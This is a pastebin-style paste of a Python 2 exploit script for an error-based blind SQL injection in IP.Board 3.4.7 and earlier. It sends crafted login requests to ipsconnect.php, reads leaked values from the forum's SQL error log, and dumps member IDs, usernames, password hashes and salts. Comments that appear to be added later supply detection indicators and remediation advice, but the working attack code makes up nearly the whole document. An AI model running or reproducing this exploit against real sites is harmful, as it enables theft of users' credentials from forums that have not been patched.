Untitled

a guest
Jul 29th, 2015
  1. #!/usr/bin/env python
  2. # Sunday, November 09, 2014 - secthrowaway () safe-mail net
  3. # IP.Board <= 3.4.7 SQLi (blind, error based);
  4. # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
  5.  
  6. import sys, re, urllib2, urllib, signal
  7.  
  8. # <socks> - http://sourceforge.net/projects/socksipy/
  9. #import socks, socket
  10. #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
  11. #socket.socket = socks.socksocket
  12. # </socks>
  13.  
  14. url = sys.argv[1]
      # url is used as a raw prefix in front of 'interface/ipsconnect/ipsconnect.php' and
      # 'cache/sql_error_latest.cgi' inside inject(). There is no argument-count check, so a
      # missing argument surfaces as IndexError. The file is Python 2 only (urllib2, print
      # statements, `except X, e`).
  15. user = sys.argv[2] # Either usergroup id or username
      # ugroup is set to True by the __main__ block when argv[2] is all digits; inject()
      # reads it only to choose its exit message.
  16. ugroup = False
  17.  
      # Every request carries this fixed, browser-like User-Agent. The literal string is at
      # best a weak indicator; log review should key on the request path and body instead.
  18. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
  19.  
  20. def inject(sql):
          # Issue one POST to interface/ipsconnect/ipsconnect.php with `sql` embedded in the
          # second id[] value, then return the text captured by "XPATH syntax error: ':(.*)'"
          # from cache/sql_error_latest.cgi. Every other outcome ends the process through
          # sys.exit (see the branches below); nothing else is ever returned.
          #
          # Defensive reading: on the server this appears as a POST with act=login and
          # array-typed id[] fields answered with HTTP 503, followed at once by a GET for
          # cache/sql_error_latest.cgi from the same client. The header comment scopes the
          # issue to IP.Board <= 3.4.7; the durable remedy is the vendor's fix for that range.
          # Denying web access to the error log removes only this read-back path (the header
          # comment notes other blind variants), not the injection itself.
          # NOTE(review): the payload travels in an array-typed id[] parameter, which suggests
          # the parameter's type is not validated server-side before the query is built --
          # confirm against ipsconnect.php.
  21.     try:
  22.         urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
          # Python 2 except syntax. Only HTTPError is handled, so connection-level failures
          # are not caught here and propagate to the caller.
  23.     except urllib2.HTTPError, e:
              # On a 503 the script fetches the web-served SQL error log and parses it.
  24.         if e.code == 503:
  25.             data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
  26.             txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
  27.             if txt is not None:
  28.                 return txt.group(1)
                  # 503 received but the log did not contain the expected error line.
  29.             sys.exit('Error [3], received unexpected data:\n%s' % data)
              # Any HTTP error status other than 503.
  30.         sys.exit('Error [1]')
          # Reached only when urlopen() raised nothing, i.e. the request completed without an
          # HTTP error status. In group mode this is reported as the end of the member list.
  31.     if ugroup:
  32.         sys.exit('Out of users!')
  33.     else:
  34.         sys.exit('Error [2]')
  35.  
  36. def signal_handler(signal, frame):
              # SIGINT handler, registered in the __main__ block: exits with a short message.
              # The `signal` parameter shadows the imported signal module inside this function;
              # the body does not use the module, so the shadowing has no effect here.
  37.         sys.exit('\nExiting...')
  38.  
  39. def get(name, table, num, p):
          # Fetch one column value, in slices when it is 31 characters or longer.
          # name / table: column and table spliced into the SELECT text.
          # p: an all-digit string selects by member_group_id with row offset `num`; any other
          #    string selects by member name (`num` is unused in that branch).
          # Returns the value as a string, built from one or more inject() calls.
          # Defensive reading: a long field costs one LENGTH request plus one request per
          # 31-character slice, so a run produces bursts of near-identical POSTs that
          # rate- or repetition-based alerting can pick up.
  40.     if p.isdigit():
  41.         p = int(p)
  42.         sqli = 'SELECT %s FROM %s WHERE member_group_id = %d LIMIT %d,1' % (name, table, p, num)
  43.     else:
  44.         sqli = 'SELECT %s FROM %s WHERE name = "%s"' % (name, table, p)
  45.  
          # int() raises ValueError if the leaked text is not a number.
  46.     s = int(inject('LENGTH((%s))' % sqli))
          # NOTE(review): 31 presumably mirrors a cap on how much text the error message
          # carries -- the source does not say; confirm.
  47.     if s < 31:
  48.         return inject(sqli)
  49.     else:
  50.         r = ''
  51.         for i in range(1, s+1, 31):
  52.             r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
  53.         return r
  54.  
  55. if __name__ == "__main__":
          # Entry point. An all-digit argv[2] walks the members of that group by increasing
          # the LIMIT offset; any other value looks up a single member by name.
          # Columns read from `members`: member_id, name, members_pass_hash, members_pass_salt.
          # Defensive reading: if the request pattern described in inject() appears in server
          # logs, treat the password hashes and salts in the members table as disclosed and
          # plan credential resets accordingly.
  56.     signal.signal(signal.SIGINT, signal_handler)
  57.     if user.isdigit():
  58.         i = 0
              # Module-level flag; changes inject()'s exit message to 'Out of users!'.
  59.         ugroup = True
              # No loop condition of its own: iteration ends when inject() calls sys.exit,
              # which happens once a request completes without an HTTP error status.
  60.         while True:
  61.             print "Userid: " + inject('SELECT member_id FROM members WHERE member_group_id = ' + user + ' LIMIT ' + str(i) + ',1')
  62.             print "Username: " + inject('SELECT name FROM members WHERE member_group_id = ' + user + ' LIMIT ' + str(i) + ',1')
                  # Only the hash goes through get(), the helper that slices long values.
  63.             print "Password hash: " + get('members_pass_hash', 'members', i, user)
  64.             print "Password salt: " + inject('SELECT members_pass_salt FROM members WHERE member_group_id = ' + user + ' LIMIT ' + str(i) + ',1')
  65.             print "--------------------------------"
  66.             i += 1
  67.     else:
              # Single-member mode: argv[2] is concatenated into each query as the name.
  68.         userid = inject('SELECT member_id FROM members WHERE name = "' + user + '"')
  69.         print "Userid: " + userid
  70.         print "Username: " + inject('SELECT name FROM members WHERE name = "' + user + '"')
  71.         print "Password hash: " + get('members_pass_hash', 'members', 0, user)
  72.         print "Password salt: " + inject('SELECT members_pass_salt FROM members WHERE name = "' + user + '"')